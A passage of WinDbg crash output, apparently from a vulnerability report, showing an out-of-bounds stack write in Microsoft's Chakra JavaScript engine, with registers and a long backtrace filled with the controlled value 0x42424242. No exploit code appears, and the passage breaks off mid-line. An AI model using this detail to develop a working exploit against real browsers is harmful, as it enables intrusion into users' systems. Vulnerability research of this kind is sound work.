chance)\r\nntdll!DbgBreakPoint:\r\n00007ffe`a1f48d70 cc int 3\r\n0:035> g\r\nonecoreuap\\inetcore\\urlmon\\zones\\zoneidentifier.cxx(359)\\urlmon.dll!00007FFE958108C0: (caller: 00007FFE9580F77D) ReturnHr(2) tid(b70) 80070002 \u0153\u00b5\u00d5\u2265\u2019\u201c\u2264\u00aa\u00b5\u03a9\u00f7\u220f\u2202\u00ae\u00b5\u0192\u0152\u0192\u00ba\u02db\u00b0\u00a3\r\n(1590.b70): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\nchakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:\r\n00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=????????????????\r\n0:016> r\r\nrax=0001000042424242 rbx=000002aa98205cbb rcx=000000d8b83f9e98\r\nrdx=0000000000000c2d rsi=0000000000000000 rdi=000002aa98200025\r\nrip=00007ffe8133ba8d rsp=000000d8b83f9bd0 rbp=000000d8b83f9c00\r\n r8=000000d8b83f9d20 r9=000002aa8688fe00 r10=000002aa86879760\r\nr11=000000d8b83f9978 r12=0000000000000000 r13=000002aa8312a270\r\nr14=0000000000000000 r15=000002aa98205cc2\r\niopl=0 nv up ei pl nz ac pe nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212\r\nchakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:\r\n00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=????????????????\r\n0:016> dq ecx\r\n000000d8`b83f9e98 00000000`00000030 000002aa`86879760\r\n000000d8`b83f9ea8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9eb8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9ec8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9ed8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9ee8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9ef8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9f08 00010000`42424242 00010000`42424242\r\n0:016> dq [ecx+edx*8]\r\n000000d8`b8400000 ????????`???????? ????????`????????\r\n000000d8`b8400010 ????????`???????? ????????`????????\r\n000000d8`b8400020 ????????`???????? ????????`????????\r\n000000d8`b8400030 ????????`???????? ????????`????????\r\n000000d8`b8400040 ????????`???????? ????????`????????\r\n000000d8`b8400050 ????????`???????? ????????`????????\r\n000000d8`b8400060 ????????`???????? ????????`????????\r\n000000d8`b8400070 ????????`???????? ????????`????????\r\n0:016> !address 000000d8`b8400000 \r\n\r\n \r\nUsage: \r\nAllocation Base: 000000d8`b8400000\r\nBase Address: 000000d8`b8400000\r\nEnd Address: 000000d8`b84fc000\r\nRegion Size: 00000000`000fc000\r\nType: 00020000\tMEM_PRIVATE\r\nState: 00002000\tMEM_RESERVE\r\nProtect: 00000000\t\r\nMore info: ~17k\r\n\r\n0:016> !address ecx\r\nUsage: Stack\r\nAllocation Base: 000000d8`b7a00000\r\nBase Address: 000000d8`b83f4000\r\nEnd Address: 000000d8`b8400000\r\nRegion Size: 00000000`0000c000\r\nType: 00020000\tMEM_PRIVATE\r\nState: 00001000\tMEM_COMMIT\r\nProtect: 00000004\tPAGE_READWRITE\r\nMore info: ~16k\r\n\r\n0:016> kb\r\nRetAddr : Args to Child : Call Site\r\n00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d\r\n00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5\r\n00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 